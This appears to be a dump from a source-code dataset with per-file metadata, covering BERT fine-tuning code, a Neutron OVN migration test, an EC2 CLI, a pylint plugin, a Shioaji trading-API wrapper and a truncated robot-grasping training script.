# pad_token_segment_id=4 if args['model_type'] in ['xlnet'] else 0,
# process_count=2)
# logger.info("Saving features into cached file %s", cached_features_file)
# torch.save(features, cached_features_file)
# all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)
# all_input_mask = torch.tensor([f.input_mask for f in features], dtype=torch.long)
# all_segment_ids = torch.tensor([f.segment_ids for f in features], dtype=torch.long)
# if output_mode == "classification":
# all_label_ids = torch.tensor([f.label_id for f in features], dtype=torch.long)
# elif output_mode == "regression":
# all_label_ids = torch.tensor([f.label_id for f in features], dtype=torch.float)
# dataset = TensorDataset(all_input_ids, all_input_mask, all_segment_ids, all_label_ids)
# return dataset
# def train(train_dataset, model, tokenizer):
# train_sampler = RandomSampler(train_dataset)
# train_dataloader = DataLoader(train_dataset, sampler=train_sampler, batch_size=args['train_batch_size'])
# t_total = len(train_dataloader) // args['gradient_accumulation_steps'] * args['num_train_epochs']
# no_decay = ['bias', 'LayerNorm.weight']
# optimizer_grouped_parameters = [
# {'params': [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)], 'weight_decay': args['weight_decay']},
# {'params': [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}
# ]
# optimizer = AdamW(optimizer_grouped_parameters, lr=args['learning_rate'], eps=args['adam_epsilon'])
# scheduler = WarmupLinearSchedule(optimizer, warmup_steps=args['warmup_steps'], t_total=t_total)
# if args['fp16']:
# try:
# from apex import amp
# except ImportError:
# raise ImportError("Please install apex from https://www.github.com/nvidia/apex to use fp16 training.")
# model, optimizer = amp.initialize(model, optimizer, opt_level=args['fp16_opt_level'])
# logger.info("***** Running training *****")
# logger.info(" Num examples = %d", len(train_dataset))
# logger.info(" Num Epochs = %d", args['num_train_epochs'])
# logger.info(" Total train batch size = %d", args['train_batch_size'])
# logger.info(" Gradient Accumulation steps = %d", args['gradient_accumulation_steps'])
# logger.info(" Total optimization steps = %d", t_total)
# global_step = 0
# tr_loss, logging_loss = 0.0, 0.0
# model.zero_grad()
# train_iterator = trange(int(args['num_train_epochs']), desc="Epoch")
# for _ in train_iterator:
# epoch_iterator = tqdm_notebook(train_dataloader, desc="Iteration")
# for step, batch in enumerate(epoch_iterator):
# model.train()
# batch = tuple(t.to(device) for t in batch)
# inputs = {'input_ids': batch[0],
# 'attention_mask': batch[1],
# 'token_type_ids': batch[2] if args['model_type'] in ['bert', 'xlnet'] else None, # XLM don't use segment_ids
# 'labels': batch[3]}
# outputs = model(**inputs)
# loss = outputs[0] # model outputs are always tuple in pytorch-transformers (see doc)
# print("\r%f" % loss, end='')
# if args['gradient_accumulation_steps'] > 1:
# loss = loss / args['gradient_accumulation_steps']
# if args['fp16']:
# with amp.scale_loss(loss, optimizer) as scaled_loss:
# scaled_loss.backward()
# torch.nn.utils.clip_grad_norm_(amp.master_params(optimizer), args['max_grad_norm'])
# else:
# loss.backward()
# torch.nn.utils.clip_grad_norm_(model.parameters(), args['max_grad_norm'])
# tr_loss += loss.item()
# if (step + 1) % args['gradient_accumulation_steps'] == 0:
# scheduler.step() # Update learning rate schedule
# optimizer.step()
# model.zero_grad()
# global_step += 1
# if args['logging_steps'] > 0 and global_step % args['logging_steps'] == 0:
# # Log metrics
# if args['evaluate_during_training']: # Only evaluate when single GPU otherwise metrics may not average well
# results = evaluate(model, tokenizer)
# logging_loss = tr_loss
# if args['save_steps'] > 0 and global_step % args['save_steps'] == 0:
# # Save model checkpoint
# output_dir = os.path.join(args['output_dir'], 'checkpoint-{}'.format(global_step))
# if not os.path.exists(output_dir):
# os.makedirs(output_dir)
# model_to_save = model.module if hasattr(model, 'module') else model # Take care of distributed/parallel training
# model_to_save.save_pretrained(output_dir)
# logger.info("Saving model checkpoint to %s", output_dir)
# return global_step, tr_loss / global_step
# def get_mismatched(labels, preds):
# mismatched = labels != preds
# examples = processor.get_dev_examples(args['data_dir'])
# wrong = [i for (i, v) in zip(examples, mismatched) if v]
# return wrong
# def get_eval_report(labels, preds):
# mcc = matthews_corrcoef(labels, preds)
# tn, fp, fn, tp = confusion_matrix(labels, preds).ravel()
# precision = precision_score(labels, preds)
# recall = recall_score(labels, preds)
# f1 = f1_score(labels, preds, average='weighted')
# return {
# "mcc": mcc,
# "f1":f1,
# "precision":precision,
# "recall":recall,
# "tp": tp,
# "tn": tn,
# "fp": fp,
# "fn": fn
# }, get_mismatched(labels, preds)
# def compute_metrics(task_name, preds, labels):
# assert len(preds) == len(labels)
# return get_eval_report(labels, preds)
# def evaluate(model, tokenizer, prefix=""):
# # Loop to handle MNLI double evaluation (matched, mis-matched)
# eval_output_dir = args['output_dir']
# results = {}
# EVAL_TASK = args['task_name']
# eval_dataset = load_and_cache_examples(EVAL_TASK, tokenizer, evaluate=True)
# if not os.path.exists(eval_output_dir):
# os.makedirs(eval_output_dir)
# eval_sampler = SequentialSampler(eval_dataset)
# eval_dataloader = DataLoader(eval_dataset, sampler=eval_sampler, batch_size=args['eval_batch_size'])
# # Eval!
# logger.info("***** Running evaluation {} *****".format(prefix))
# logger.info(" Num examples = %d", len(eval_dataset))
# logger.info(" Batch size = %d", args['eval_batch_size'])
# eval_loss = 0.0
# nb_eval_steps = 0
# preds = None
# out_label_ids = None
# for batch in tqdm_notebook(eval_dataloader, desc="Evaluating"):
# model.eval()
# batch = tuple(t.to(device) for t in batch)
# with torch.no_grad():
# inputs = {'input_ids': batch[0],
# 'attention_mask': batch[1],
# 'token_type_ids': batch[2] if args['model_type'] in ['bert', 'xlnet'] else None, # XLM don't use segment_ids
# 'labels': batch[3]}
# outputs = model(**inputs)
# tmp_eval_loss, logits = outputs[:2]
# eval_loss += tmp_eval_loss.mean().item()
# nb_eval_steps += 1
# if preds is None:
# preds = logits.detach().cpu().numpy()
# out_label_ids = inputs['labels'].detach().cpu().numpy()
# else:
# preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
# out_label_ids = np.append(out_label_ids, inputs['labels'].detach().cpu().numpy(), axis=0)
# eval_loss = eval_loss / nb_eval_steps
# if args['output_mode'] == "classification":
# # preds = np.argmax(preds, axis=1)
# precision_, recall_, proba = precision_recall_curve(out_label_ids, preds[:, -1])
# optimal_proba_cutoff = sorted(list(zip(np.abs(precision_ - recall_), proba)), key=lambda i: i[0], reverse=False)[0][1]
# print("Optimum threshold is:", optimal_proba_cutoff)
# preds = [1 if i >= optimal_proba_cutoff else 0 for i in preds[:, -1]]
# elif args['output_mode'] == "regression":
# preds = np.squeeze(preds)
# result, wrong = compute_metrics(EVAL_TASK, preds, out_label_ids)
# results.update(result)
# output_eval_file = os.path.join(eval_output_dir, "eval_results.txt")
# with open(output_eval_file, "w") as writer:
# logger.info("***** Eval results {} *****".format(prefix))
# for key in sorted(result.keys()):
# logger.info(" %s = %s", key, str(result[key]))
# writer.write("%s = %s\n" % (key, str(result[key])))
# return results, wrong
# args = json.loads('args.json')
# MODEL_CLASSES = {
# 'bert': (BertConfig, BertForSequenceClassification, BertTokenizer),
# 'xlnet': (XLNetConfig, XLNetForSequenceClassification, XLNetTokenizer),
# 'xlm': (XLMConfig, XLMForSequenceClassification, XLMTokenizer),
# 'roberta': (RobertaConfig, RobertaForSequenceClassification, RobertaTokenizer)
# }
# config_class, model_class, tokenizer_class = MODEL_CLASSES[args['model_type']]
# config = config_class.from_pretrained(args['model_name'], num_labels=2, finetuning_task=args['task_name'])
# tokenizer = tokenizer_class.from_pretrained(args['model_name'])
# model = model_class.from_pretrained(args['model_name'])
# model.to(device);
# task = args['task_name']
# processor = processors[task]()
# label_list = processor.get_labels()
# num_labels = len(label_list)
# ### Optional ###
# if args['do_train']:
# train_dataset = load_and_cache_examples(task, tokenizer, undersample_scale_factor=0.1)
# global_step, tr_loss = train(train_dataset, model, tokenizer)
# logger.info(" global_step = %s, average loss = %s", global_step, tr_loss)
# ### Optional ###
# if args['do_train']:
# if not os.path.exists(args['output_dir']):
# os.makedirs(args['output_dir'])
# logger.info("Saving model checkpoint to %s", args['output_dir'])
# model_to_save = model.module if hasattr(model, 'module') else model # Take care of distributed/parallel training
# model_to_save.save_pretrained(args['output_dir'])
# tokenizer.save_pretrained(args['output_dir'])
# torch.save(args, os.path.join(args['output_dir'], 'training_args.bin'))
# results = {}
# if args['do_eval']:
# checkpoints = [args['output_dir']]
# if args['eval_all_checkpoints']:
# checkpoints = list(os.path.dirname(c) for c in sorted(glob.glob(args['output_dir'] + '/**/' + WEIGHTS_NAME, recursive=True)))
# logging.getLogger("pytorch_transformers.modeling_utils").setLevel(logging.WARN) # Reduce logging
# logger.info("Evaluate the following checkpoints: %s", checkpoints)
# for checkpoint in checkpoints:
# global_step = checkpoint.split('-')[-1] if len(checkpoints) > 1 else ""
# model = model_class.from_pretrained(checkpoint)
# model.to(device)
# result, wrong_preds = evaluate(model, tokenizer, prefix=global_step)
# result = dict((k + '_{}'.format(global_step), v) for k, v in result.items())
# results.update(result)
# print(results) | 35.139628 | 140 | 0.656575 |
0b9ad4b521df540970b8806ae195225ff8874e6c | 7,567 | py | Python | neutron/tests/unit/plugins/ml2/drivers/ovn/test_db_migration.py | Joffref/neutron | 09f72d2ac42ff92a4a3f96dd00800ba0cf367270 | [
"Apache-2.0"
] | 1,080 | 2015-01-04T08:35:00.000Z | 2022-03-27T09:15:52.000Z | neutron/tests/unit/plugins/ml2/drivers/ovn/test_db_migration.py | Joffref/neutron | 09f72d2ac42ff92a4a3f96dd00800ba0cf367270 | [
"Apache-2.0"
] | 24 | 2015-02-21T01:48:28.000Z | 2021-11-26T02:38:56.000Z | neutron/tests/unit/plugins/ml2/drivers/ovn/test_db_migration.py | Joffref/neutron | 09f72d2ac42ff92a4a3f96dd00800ba0cf367270 | [
"Apache-2.0"
] | 1,241 | 2015-01-02T10:47:10.000Z | 2022-03-27T09:42:23.000Z | # Copyright 2021 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
from neutron_lib.api.definitions import portbindings as pb
from neutron_lib.api.definitions import provider_net as pnet
from neutron_lib import context as n_context
from neutron_lib.db import api as db_api
from neutron_lib import exceptions
from oslo_utils import uuidutils
from neutron.db.models.plugins.ml2 import geneveallocation
from neutron.db.models.plugins.ml2 import vxlanallocation
from neutron.objects import ports as port_obj
from neutron.objects import trunk as trunk_obj
from neutron.plugins.ml2.drivers.ovn import db_migration
from neutron.tests.unit.plugins.ml2.drivers.ovn.mech_driver import (
test_mech_driver)
class TestMigrateNeutronDatabaseToOvn(
test_mech_driver.TestOVNMechanismDriverBase):
def _create_ml2_ovs_test_resources(self, vif_details_list):
self.subport_profiles = {}
ctx = n_context.get_admin_context()
for sid in range(1, 6):
net_arg = {pnet.NETWORK_TYPE: 'vxlan',
pnet.SEGMENTATION_ID: sid}
network_id = self._make_network(self.fmt, 'net%d' % sid, True,
arg_list=(pnet.NETWORK_TYPE,
pnet.SEGMENTATION_ID,),
**net_arg)['network']['id']
for vif_details in vif_details_list:
port = self._make_port(self.fmt, network_id)['port']
port_o = port_obj.PortBinding.get_object(
ctx, port_id=port['id'], host='')
port_o.vif_type = 'ovs'
port_o.vif_details = vif_details
port_o.update()
for i in range(1, 4):
port = self._make_port(self.fmt, network_id)['port']
subport1 = self._make_port(self.fmt, network_id)['port']
subport2 = self._make_port(self.fmt, network_id)['port']
trunk_id = uuidutils.generate_uuid()
subports = [trunk_obj.SubPort(
ctx,
port_id=subport1['id'],
trunk_id=trunk_id,
segmentation_type="vlan",
segmentation_id=i * 10 + j) for j in range(2)]
trunk = trunk_obj.Trunk(
ctx,
id=trunk_id,
port_id=port['id'],
project_id='foo',
subports=subports)
trunk.create()
subport_pb = port_obj.PortBinding.get_object(
ctx, port_id=subport1['id'], host='')
self.assertFalse(subport_pb.profile)
self.subport_profiles[subport1['id']] = {"parent_name": port['id'],
"tag": i * 10}
self.subport_profiles[subport2['id']] = {"parent_name": port['id'],
"tag": i * 10 + 1}
# set something to the last subport port binding
subport_pb = port_obj.PortBinding.get_object(
ctx, port_id=subport2['id'], host='')
# need to generate new id
subport_pb.profile = subport_pb.profile.copy()
subport_pb.profile['foo'] = 'bar'
subport_pb.update()
self.subport_profiles[subport2['id']]["foo"] = "bar"
def _validate_resources_after_migration(self, expected_vif_details):
ctx = n_context.get_admin_context()
# Check network types
networks = self.plugin.get_networks(ctx)
for network in networks:
self.assertEqual("geneve", network["provider:network_type"])
with db_api.CONTEXT_READER.using(ctx) as session:
# Check there are no vxlan allocations
vxlan_allocations = session.query(
vxlanallocation.VxlanAllocation).filter(
vxlanallocation.VxlanAllocation.allocated == True # noqa
).all()
self.assertFalse(vxlan_allocations)
# Check all the networks have Geneve allocations
geneve_allocations = session.query(
geneveallocation.GeneveAllocation).filter(
geneveallocation.GeneveAllocation.allocated == True # noqa
).all()
self.assertEqual(len(networks), len(geneve_allocations))
# Check port bindings vif details are as expected
ports = self.plugin.get_ports(ctx)
for port in ports:
self.assertIn(port['binding:vif_details'], expected_vif_details)
# Check port profiles for subport ports
for trunk in trunk_obj.Trunk.get_objects(ctx):
for subport in trunk.sub_ports:
port = self.plugin.get_port(ctx, id=subport.port_id)
self.assertEqual(
self.subport_profiles[subport.port_id],
port["binding:profile"])
def test_db_migration(self):
"""Test the DB migration
It creates 5 vxlan networks, each should get a vxlan vni allocated.
Then it creates 3 ports with different vif details.
After the DB migration the vxlan networks should not be allocated but
be geneve type and have geneve allocations. Also the port binding vif
details should not contain hybrid plugging, bridge name for trunk and
l2 connectivity for OVS agent.
"""
vif_details_list = [
{pb.CAP_PORT_FILTER: "true",
pb.OVS_HYBRID_PLUG: "true",
pb.VIF_DETAILS_BRIDGE_NAME: "foo",
pb.VIF_DETAILS_CONNECTIVITY: pb.CONNECTIVITY_L2},
{pb.CAP_PORT_FILTER: "true",
pb.VIF_DETAILS_BRIDGE_NAME: "foo"},
{"foo": "bar"},
{},
]
expected_vif_details = [
{pb.CAP_PORT_FILTER: "true",
pb.VIF_DETAILS_CONNECTIVITY: pb.CONNECTIVITY_L2},
{pb.CAP_PORT_FILTER: "true"},
{"foo": "bar"},
{},
]
self._create_ml2_ovs_test_resources(vif_details_list)
db_migration.migrate_neutron_database_to_ovn(self.mech_driver._plugin)
self._validate_resources_after_migration(expected_vif_details)
def test_db_migration_with_pb_not_found(self):
vif_details_list = [
{pb.CAP_PORT_FILTER: "true",
pb.OVS_HYBRID_PLUG: "true",
pb.VIF_DETAILS_BRIDGE_NAME: "foo",
pb.VIF_DETAILS_CONNECTIVITY: "l2"},
{pb.CAP_PORT_FILTER: "true",
pb.VIF_DETAILS_BRIDGE_NAME: "foo"},
{"foo": "bar"},
{},
]
self._create_ml2_ovs_test_resources(vif_details_list)
with mock.patch.object(
port_obj.PortBinding, 'update',
side_effect=exceptions.ObjectNotFound(id='foo')):
with mock.patch.object(trunk_obj.Trunk, 'get_objects',
return_value=[]):
db_migration.migrate_neutron_database_to_ovn(
self.mech_driver._plugin)
self._validate_resources_after_migration(vif_details_list)
| 40.682796 | 79 | 0.612132 |
2bc6b1d2a56c9993b3d7f77a7c1219f8c16f4bb1 | 868 | py | Python | layersclick/ec2_instance.py | hdknr/py-layers | 884ffb2a681910cec7c8deb934c60a71dbd72b80 | [
"MIT"
] | null | null | null | layersclick/ec2_instance.py | hdknr/py-layers | 884ffb2a681910cec7c8deb934c60a71dbd72b80 | [
"MIT"
] | null | null | null | layersclick/ec2_instance.py | hdknr/py-layers | 884ffb2a681910cec7c8deb934c60a71dbd72b80 | [
"MIT"
] | null | null | null | import click
from layerslib.ec2 import instance
from .utils import J, setup
@click.group()
@click.option("--profile_name", "-p", default=None)
@click.pass_context
def ec2_instance(ctx, profile_name):
setup(ctx, profile_name)
@ec2_instance.command()
@click.pass_context
def instance_list(ctx):
"""ec2: get Instance
layers ec2 -p yourog instance-list \
| jq -r ".[] | [
.InstanceId,
.Tags[0].Value,
.SecurityGroups[0].GroupName,
.SecurityGroups[0].GroupId] | @csv" \
| csvtomd
"""
instance_set = instance.get_instances()
click.echo(J(instance_set))
@ec2_instance.command()
@click.argument("instance_id")
@click.pass_context
def create_ami(ctx, instance_id):
"""ec2: create AMI for instance_id """
obj = instance.Instance.factory(instance_id)
obj.create_image()
| 22.25641 | 51 | 0.656682 |
b684b92267bc405e4f36930958ad7df8fe4381db | 107 | py | Python | pylint_complexity/__init__.py | willprice/pylint-quality | 34921e7fe30d3417e2f1ae3e1dc11082d5b850ab | [
"Apache-2.0"
] | null | null | null | pylint_complexity/__init__.py | willprice/pylint-quality | 34921e7fe30d3417e2f1ae3e1dc11082d5b850ab | [
"Apache-2.0"
] | null | null | null | pylint_complexity/__init__.py | willprice/pylint-quality | 34921e7fe30d3417e2f1ae3e1dc11082d5b850ab | [
"Apache-2.0"
] | null | null | null | from .method_count_checker import MethodCountChecker
from .method_length_checker import MethodLengthChecker | 53.5 | 54 | 0.915888 |
a0df4d8eb13037dcf09f28c3258698e74817c06d | 15,973 | py | Python | shioajicaller/caller.py | SDpower/shioajicaller | d24957a33ec31ba5bca957ac87b55ca6d1cabb32 | [
"MIT"
] | 14 | 2021-10-04T16:46:55.000Z | 2022-03-20T02:11:33.000Z | shioajicaller/caller.py | SDpower/shioajicaller | d24957a33ec31ba5bca957ac87b55ca6d1cabb32 | [
"MIT"
] | 1 | 2022-01-15T19:38:03.000Z | 2022-01-17T05:29:13.000Z | shioajicaller/caller.py | SDpower/shioajicaller | d24957a33ec31ba5bca957ac87b55ca6d1cabb32 | [
"MIT"
] | 10 | 2021-10-04T17:15:27.000Z | 2022-02-08T03:10:51.000Z | # -*- coding: utf-8 -*-
import sys, logging
from datetime import datetime,date,timedelta
from . import config
import time
import shioaji as sj
from shioaji import TickFOPv1, TickSTKv1, BidAskSTKv1, BidAskFOPv1,Exchange
class Caller(object):
def __init__(self):
self._userID = config.userId
self._userPassowrd = config.userPassowrd
self._connected = False
self._api = sj.Shioaji()
self._caStatus = False
logging.info("shioaji version:"+sj.__version__)
print("shioaji version:"+sj.__version__)
self._api.quote.set_event_callback(self._event_callback)
self._api.quote.set_on_tick_stk_v1_callback(self.Quote_callback_stk_v1_tick)
self._api.quote.set_on_bidask_stk_v1_callback(self.Quote_callback_stk_v1_bidask)
self._api.quote.set_on_tick_fop_v1_callback(self.Quote_callback_fop_v1_tick)
self._api.quote.set_on_bidask_fop_v1_callback(self.Quote_callback_fop_v1_bidask)
self._api.set_order_callback(self.Order_CallBack)
def Order_CallBack(self,stat, msg):
if hasattr(self, 'OrderCB'):
self.OrderCB(stat, msg)
def Trade_CallBack(self,keyword_params):
if hasattr(self, 'TradeCB'):
self.TradeCB(**keyword_params)
def SetOrderCallBack(self,callback):
if callable(callback):
self.OrderCB=callback
def SetTradeCallBack(self,callback):
if callable(callback):
self.TradeCB=callback
def SetEnevtCallBack(self,callback):
if callable(callback):
self.EventCallback=callback
def SetSubscribeStocksTickCallBack(self,callback):
if callable(callback):
self.SubscribeStocksTickCallBack= callback
def SetSubscribeFuturesTickCallBack(self,callback):
if callable(callback):
self.SubscribeFuturesTickCallBack= callback
def SetSubscribeStocksBidaskCallBack(self,callback):
if callable(callback):
self.SubscribeStocksBidaskCallBack= callback
def SetSubscribeFuturesBidaskCallBack(self,callback):
if callable(callback):
self.SubscribeFuturesBidaskCallBack= callback
def SetAccount(self,userId:str="",userPassowrd:str=""):
if userId != None and userId !="":
self._userID = userId
if userPassowrd != None and userPassowrd !="":
self._userPassowrd = userPassowrd
def GetStockAccount(self):
if (self._check_connect()):
return self._api.stock_account
return False
def GetFutoptAccount(self):
if (self._check_connect()):
return self._api.futopt_account
return False
def GetAccountList(self):
if (self._check_connect()):
return self._api.list_accounts()
return False
def GetAccount(self):
if (self._check_connect()):
return self._accounts
return False
# only for futoptand and option !? https://sinotrade.github.io/tutor/accounting/account_portfolio/
# On top has:The features of this page will be removed in the future.
def GetAccountMargin(self):
if (self._check_connect()):
return self._api.get_account_margin()
return False
def GetAccountMarginData(self):
account_margin = self.GetAccountMargin()
if account_margin:
return account_margin.data()
return False
def GetAccountOpenposition(self):
if (self._check_connect()):
return self._api.get_account_openposition()
return False
def GetAccountOpenpositionData(self):
account_openposition = self.GetAccountOpenposition()
if account_openposition:
return account_openposition.data()
return False
def GetAccountSettleProfitloss(self,start_date:str=""):
if (self._check_connect()):
if start_date == "":
start_date = (date.today() - timedelta(days=30)).strftime('%Y%m%d')
return self._api.get_account_settle_profitloss(start_date=start_date)
return False
def GetAccountSettleProfitlossData(self,start_date:str=""):
account_settle_profitloss = self.GetAccountSettleProfitloss(start_date)
if account_settle_profitloss:
return account_settle_profitloss.data()
return False
def Login(self):
if self._userPassowrd == None or self._userPassowrd == "" or self._userID == None or self._userID == "":
logging.error("Error!! No UserId or UserPassowrd.")
sys.exit(70)
self._accounts = self._api.login(self._userID, self._userPassowrd,contracts_cb = self.ContractsDone())
def LogOut(self):
self._connected = False
self._connected_ts = None
ret = self._api.logout()
self._api.Contracts = None
logging.info(f"LogOut.")
return ret
def ActivateCa(self,Cafiles:str="Sinopac.pfx",PersonId:str="",CaPasswd:str=""):
if PersonId =="":
PersonId = self._userID
if (self._check_connect()):
result = self._api.activate_ca(
ca_path=Cafiles,
ca_passwd=CaPasswd,
person_id=PersonId,
)
self._caStatus = result
return result
else:
return False
def ContractsDone(self):
logging.info(f"Loading Contracts is Done.")
def SubscribeStocks(self,code:str="",quote_type:str="tick",intraday_odd:bool=False,version:str="v1"):
if (code == None or code ==""):
return False
logging.info(f"SubscribeStocks {code} {quote_type} {version}")
if (self._check_connect()):
contract = self._api.Contracts.Stocks[code]
if contract != None:
self._api.quote.subscribe(contract ,quote_type=quote_type, intraday_odd=intraday_odd ,version=version)
return True
else:
return False
else:
return False
def SubscribeFutures(self,code:str="",quote_type:str="tick",intraday_odd:bool=False,version:str="v1"):
if (code == None or code ==""):
return False
logging.info(f"SubscribeFutures {code} {quote_type} {version}")
if (self._check_connect()):
contract = self._api.Contracts.Futures[code]
if contract != None:
self._api.quote.subscribe(contract ,quote_type=quote_type, intraday_odd=intraday_odd ,version=version)
return True
else:
return False
else:
return False
def UpdateOrderById(self,order_id:str="",price:float=0.0,qty:int=0):
if self._check_connect():
self._api.update_status()
tradeList = self._api.list_trades()
if len(tradeList) == 0:
return False
else:
for trade in tradeList:
if trade.order.id == order_id:
if price > 0.0 and qty > 0:
return dict(**self._api.update_order(trade=trade, price=price, qty=qty))
elif price > 0.0:
return dict(**self._api.update_order(trade=trade, price=price))
elif qty > 0:
return dict(**self._api.update_order(trade=trade, qty=qty))
else:
return False
return False
else:
return False
def CancelOrderById(self,order_id:str=""):
if self._check_connect():
self._api.update_status()
tradeList = self._api.list_trades()
if len(tradeList) == 0:
return False
else:
for trade in tradeList:
if trade.order.id == order_id:
return dict(**self._api.cancel_order(trade))
return False
else:
return False
def GetOrderById(self,order_id:str=""):
if self._check_connect():
self._api.update_status()
tradeList = self._api.list_trades()
if len(tradeList) == 0:
return False
else:
for trade in tradeList:
if trade.order.id == order_id:
return dict(**trade)
return False
else:
return False
def GetOrderList(self):
if self._check_connect():
self._api.update_status()
tradeList = self._api.list_trades()
if len(tradeList) == 0:
return tradeList
else:
ret=[]
for trade in tradeList:
ret.append(dict(**trade))
return ret
else:
return False
def OrderStocks(self,code:str="",price:float=0.0,quantity:int=0,action:str="",price_type:str="",order_type:str="",order_cond:str="",order_lot:str="Common",first_sell:str="false"):
"""
Code: Stocks code.
price: 10.0
quantity: 1
action: {Buy, Sell} (買、賣)
price_type: {LMT, MKT} (限價、市價)
order_type: {ROD, IOC, FOK} (當日有效、立即成交否則取消、全部成交否則取消)
order_cond: {Cash, MarginTrading, ShortSelling} (現股、融資、融券)
order_lot: {Common, Fixing, Odd, IntradayOdd} (整股、定盤、盤後零股、盤中零股)
first_sell {str}: {true, false}
"""
if self._check_connect():
if not self._caStatus:
return False
if (code == None or code ==""):
return False
if (price_type == "LMT" and price <= 0 ):
return False
contract = self._api.Contracts.Stocks[code]
order = self._api.Order(
action=action,
price=price,
quantity=quantity,
price_type=price_type,
order_type=order_type,
order_cond=order_cond,
order_lot=order_lot,
first_sell=first_sell,
account=self._api.stock_account)
return dict(**self._api.place_order(contract, order, timeout=0,cb=self.Trade_CallBack))
else:
return False
def OrderFutures(self,code:str="",price:float=0.0,quantity:int=0,action:str="",price_type:str="",order_type:str="",octype:str=""):
"""
Code: Futures code.
price: 100.0
quantity: 1
action: {Buy, Sell} (買、賣)
price_type: {LMT, MKT, MKP} (限價、市價、範圍市價)
order_type: {ROD, IOC, FOK} (當日有效、立即成交否則取消、全部成交否則取消)
octype: {Auto, NewPosition, Cover, DayTrade} (自動、新倉、平倉、當沖)
"""
if self._check_connect():
if not self._caStatus:
return False
if (code == None or code ==""):
return False
if (price_type == "LMT" and price <= 0 ):
return False
contract = self._api.Contracts.Futures[code]
order = self._api.Order(
action=action,
price=price,
quantity=quantity,
price_type=price_type,
order_type=order_type,
octype=octype,
account=self._api.futopt_account)
return dict(**self._api.place_order(contract, order, timeout=0,cb=self.Trade_CallBack))
else:
return False
def Quote_callback_stk_v1_tick(self,exchange: Exchange, tick:TickSTKv1):
tickdata = tick.to_dict(raw=True)
tickdata['UNTime']= datetime.now()
tickdata['exchange']= f'{exchange}'
if hasattr(self, 'SubscribeStocksTickCallBack'):
self.SubscribeStocksTickCallBack(tickdata)
def Quote_callback_stk_v1_bidask(self,exchange: Exchange, bidask:BidAskSTKv1):
bidaskdata = bidask.to_dict(raw=True)
bidaskdata['UNTime']= datetime.now()
bidaskdata['exchange']= f'{exchange}'
if hasattr(self, 'SubscribeStocksBidaskCallBack'):
self.SubscribeStocksBidaskCallBack(bidaskdata)
def Quote_callback_fop_v1_tick(self,exchange: Exchange, tick:TickFOPv1):
tickdata = tick.to_dict(raw=True)
tickdata['UNTime']= datetime.now()
tickdata['exchange']= f'{exchange}'
if hasattr(self, 'SubscribeFuturesTickCallBack'):
self.SubscribeFuturesTickCallBack(tickdata)
def Quote_callback_fop_v1_bidask(self,exchange: Exchange, bidask:BidAskFOPv1):
bidaskdata = bidask.to_dict(raw=True)
bidaskdata['UNTime']= datetime.now()
bidaskdata['exchange']= f'{exchange}'
if hasattr(self, 'SubscribeFuturesBidaskCallBack'):
self.SubscribeFuturesBidaskCallBack(bidaskdata)
def Quote_callback(self,topic: str, quote: dict):
print(f"Tpoic:{topic} Quote: {quote}")
def _event_callback(self,ResponseCode:int,Code:int, Message:str,Description:str):
logging.info(f'EventCallback {ResponseCode} {Code} {Message} Event: {Description}')
if ResponseCode == 0 and Code == 0:
self._connected = True
self._connected_ts=time.time()
if hasattr(self, 'EventCallback'):
item = {
"ResponseCode":ResponseCode,
"Code": Code,
"Message": Message,
"Description": Description,
}
self.EventCallback(item)
def _check_connect(self, timeout=30, period=0.25):
if self._connected and (time.time() - self._connected_ts) < 86400-30:
return self._accounts
# token timeout 24hr before 30sec will relogin
if self._connected and (time.time() - self._connected_ts) >= 86400-30:
self.LogOut
self.Login()
mustend = time.time() + timeout
while time.time() < mustend:
if self._connected == True: return True
time.sleep(period)
return False
def GetTicks(self,StockCode:str="",FutureCode:str="",**kwargs):
if (self._check_connect()):
if StockCode != None and StockCode !="":
contract = self.getContractsStockByCode(StockCode)
if FutureCode != None and FutureCode !="":
contract = self.getContractsFutures(FutureCode)
if contract != None:
return self._api.ticks(contract=contract, **kwargs)
return False
def GetBars(self,StockCode:str="",FutureCode:str="",**kwargs):
if (self._check_connect()):
if StockCode != None and StockCode !="":
contract = self.getContractsStockByCode(StockCode)
if FutureCode != None and FutureCode !="":
contract = self.getContractsFutures(FutureCode)
if contract != None:
return self._api.kbars(contract=contract, **kwargs)
return False
## OTC, TSE
def getContractsIndexs(self,Exchange:str):
if (self._check_connect()):
return self._api.Contracts.Indexs[Exchange]
## OES, OTC, TSE
def getContractsStocks(self,Exchange:str):
if (self._check_connect()):
return self._api.Contracts.Stocks[Exchange]
def getContractsStockByCode(self,Code:str):
if (self._check_connect()):
return self._api.Contracts.Stocks[Code]
def getContractsFutures(self,Code:str=""):
if (self._check_connect()):
if Code == "":
return self._api.Contracts.Futures
else:
return self._api.Contracts.Futures[Code]
def getContractsOptions(self,Code:str=""):
if (self._check_connect()):
if Code == "":
return self._api.Contracts.Options
else:
return self._api.Contracts.Options[Code]
def __del__(self):
if self._connected:
self._api.logout()
del self._api | 37.850711 | 183 | 0.591999 |
d80dd98cfd33985bdc8de27e2ad2810d56cce77b | 1,498 | py | Python | cnn_grasp_main.py | gouxiangchen/DRL-grasp | daf4878e297b4762bd8eee71dca226826784dad1 | [
"Apache-2.0"
] | 7 | 2019-10-13T13:01:25.000Z | 2022-03-13T02:24:34.000Z | cnn_grasp_main.py | gouxiangchen/DRL-grasp | daf4878e297b4762bd8eee71dca226826784dad1 | [
"Apache-2.0"
] | 1 | 2020-11-08T03:13:28.000Z | 2020-11-08T03:13:28.000Z | cnn_grasp_main.py | gouxiangchen/DRL-grasp | daf4878e297b4762bd8eee71dca226826784dad1 | [
"Apache-2.0"
] | null | null | null | from VisualGrasp.environment import EnvGrasp
from VisualGrasp.model import CNNPolicy, CNNValue
from VisualGrasp.train import GraspTrain
from itertools import count
from MyDQN.logger import Logger
env = EnvGrasp()
gt = GraspTrain(CNNPolicy, CNNValue, 2, 2)
k = 0
log = Logger('./logs_grasp_cnn')
steps = 0
for t in count():
steps += 1
episode_reward = 0
state, frame, pos = env.reset()
